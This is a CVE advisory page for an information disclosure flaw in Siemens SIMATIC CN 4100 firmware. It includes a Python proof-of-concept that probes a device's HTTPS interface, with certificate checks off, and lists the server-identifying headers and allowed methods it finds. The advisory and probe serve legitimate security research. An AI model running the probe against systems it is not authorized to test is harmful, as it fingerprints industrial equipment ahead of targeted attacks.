Security Vulnerability Report
CVE-2025-40941 CVSS 4.3 MEDIUM

CVE-2025-40941

Published: 2025-12-09 16:17:48
Last Modified: 2025-12-10 21:32:01

Description

A vulnerability has been identified in SIMATIC CN 4100 (all versions < V4.0.1). The affected device exposes server information in its responses. This could allow an attacker with network access to gain useful information, increasing the likelihood of targeted attacks. Note that the CVSS vector below rates Privileges Required as Low (PR:L), i.e. the attacker is assumed to already hold low-privileged access to the device; the weakness is classified as CWE-200 (exposure of sensitive information to an unauthorized actor).

CVSS Details

CVSS Score
4.3 (CVSS v3.1 base score; the vendor's CVSS v4.0 base score for the same issue is 5.3, also MEDIUM)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform node of the AND configuration; the vulnerable match is the firmware CPE above, so this does not mean the hardware is unaffected)
SIMATIC CN 4100 — all versions < V4.0.1 (所有 < V4.0.1 版本); versionEndExcluding is 4.0.1, so V4.0.1 and later are outside the affected range.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it only against devices you are explicitly authorized to test. Be aware that it disables TLS certificate verification (verify=False), sends unauthenticated requests even though the advisory rates the issue PR:L, and treats any Server/Allow header as a hit — a positive result shows that server information is disclosed but does not by itself confirm CVE-2025-40941 or that the firmware is < V4.0.1.
python
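#!/usr/bin/env python3
"""
CVE-2025-40941 PoC - SIMATIC CN 4100 Information Disclosure

Probes a SIMATIC CN 4100 web interface and reports server information
returned in HTTP response headers (Server, X-Powered-By, X-AspNet-Version,
Allow) and version-like strings found in response bodies.

Scope and limitations:
  * Almost every HTTP server emits a Server or Allow header, so a hit is
    evidence of information disclosure in general, not proof that the target
    is an affected CN 4100 (< V4.0.1). Confirm the firmware version before
    treating a result as CVE-2025-40941.
  * The advisory's CVSS vector is PR:L (privileges required: low). These
    probes are unauthenticated and may therefore not reach the responses the
    advisory describes.
  * TLS certificate verification is disabled (verify=False) because device
    web UIs commonly present self-signed certificates. Only point this script
    at hosts you are authorized to test.

Usage: <script> <target_ip> [port]
Exit status: 0 when server information was disclosed, 1 otherwise.
"""
import json
import re
import sys
import warnings

__all__ = ["check_vulnerability", "extract_server_info", "mentions_version", "main"]

# Response headers that identify the server software, mapped to the result
# keys used in the report (names kept identical to the original PoC).
_INFO_HEADERS = {
    "server": "Server_Header",
    "x-powered-by": "X_Powered_By",
    "x-aspnet-version": "AspNet_Version",
}

# "version" anywhere, or a firmware-style token such as "V4.0.1".
# The original check ('V' in text) matched any capital V and therefore
# fired on practically every HTML page.
_VERSION_RE = re.compile(r"version|\bV\d+(?:\.\d+)+", re.IGNORECASE)


def extract_server_info(headers) -> dict[str, str]:
    """Return identifying headers found in *headers*, keyed by report name.

    Args:
        headers: any mapping of header name -> value; names are matched
            case-insensitively so both plain dicts and requests'
            CaseInsensitiveDict work.

    Returns:
        dict with any of Server_Header, X_Powered_By, AspNet_Version;
        empty when none of the identifying headers is present.
    """
    lowered = {str(name).lower(): value for name, value in headers.items()}
    return {key: lowered[name] for name, key in _INFO_HEADERS.items() if name in lowered}


def mentions_version(text: str) -> bool:
    """True when *text* contains the word 'version' or a V<major>.<minor>… token."""
    return _VERSION_RE.search(text or "") is not None


def check_vulnerability(target_ip, target_port=443):
    """
    Probe https://target_ip:target_port for disclosed server information.

    Args:
        target_ip: host name or IP address of the device.
        target_port: HTTPS port (default 443).

    Returns:
        (disclosed, info): disclosed is True when at least one identifying
        header was observed; info maps report keys (Server_Header,
        X_Powered_By, AspNet_Version, Allowed_Methods) to the values seen.
    """
    # Imported here so the parsing helpers above stay usable (and testable)
    # without the third-party dependency installed.
    import requests

    print(f"[*] Testing target: {target_ip}:{target_port}")
    base = f"https://{target_ip}:{target_port}"
    urls = [f"{base}/", f"{base}/index.html", f"{base}/login"]
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }

    exposed_info = {}
    for url in urls:
        print(f"\n[*] Probing: {url}")
        try:
            # verify=False: device UIs typically present self-signed certs.
            response = requests.get(url, headers=headers, verify=False, timeout=10)
        except requests.exceptions.SSLError as e:
            # No plain-HTTP fallback is attempted, so do not promise one.
            print(f"[!] TLS error for {url}: {e}")
            continue
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
            continue

        found = extract_server_info(response.headers)
        for key, value in found.items():
            print(f"[+] {key}: {value}")
        exposed_info.update(found)

        if mentions_version(response.text):
            print("[!] Potential version information found in response body")

        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Headers: {json.dumps(dict(response.headers), indent=2)}")

    # An Allow header on OPTIONS enumerates the methods the server supports.
    print("\n[*] Testing OPTIONS method...")
    try:
        options_response = requests.options(f"{base}/", verify=False, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] OPTIONS request failed: {e}")
    else:
        allow = options_response.headers.get("Allow")
        if allow is not None:
            exposed_info["Allowed_Methods"] = allow
            print(f"[+] Allowed Methods: {allow}")

    if exposed_info:
        print("\n[+] Server information disclosed in responses")
        print("[!] This matches the advisory's symptom but is not proof of "
              "CVE-2025-40941: confirm the device is a SIMATIC CN 4100 "
              "running firmware < V4.0.1")
        return True, exposed_info
    print("\n[-] No obvious information disclosure detected")
    return False, {}


def main(argv) -> int:
    """Parse `<target_ip> [port]` from *argv*, run the probe, return the exit status."""
    if len(argv) < 2:
        print(f"Usage: {argv[0]} <target_ip> [port]")
        return 1
    target = argv[1]
    try:
        port = int(argv[2]) if len(argv) > 2 else 443
    except ValueError:
        print(f"[!] Invalid port: {argv[2]!r}")
        return 1
    if not 1 <= port <= 65535:
        print(f"[!] Port out of range: {port}")
        return 1
    # Silence the per-request urllib3 InsecureRequestWarning caused by verify=False.
    warnings.filterwarnings("ignore", message="Unverified HTTPS request")
    vulnerable, _info = check_vulnerability(target, port)
    return 0 if vulnerable else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))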

References

Siemens ProductCERT advisory SSA-416652 (vendor advisory): https://cert-portal.siemens.com/productcert/html/ssa-416652.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40941", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:47.997", "lastModified": "2025-12-10T21:32:01.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected devices exposes server information in its responses.\r\nThis could allow an attacker with network access to gain useful information, increasing the likelihood of targeted attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.1", "matchCriteriaId": "FF07D3DA-F412-4FBF-BB1B-3C889F74509E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-416652.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}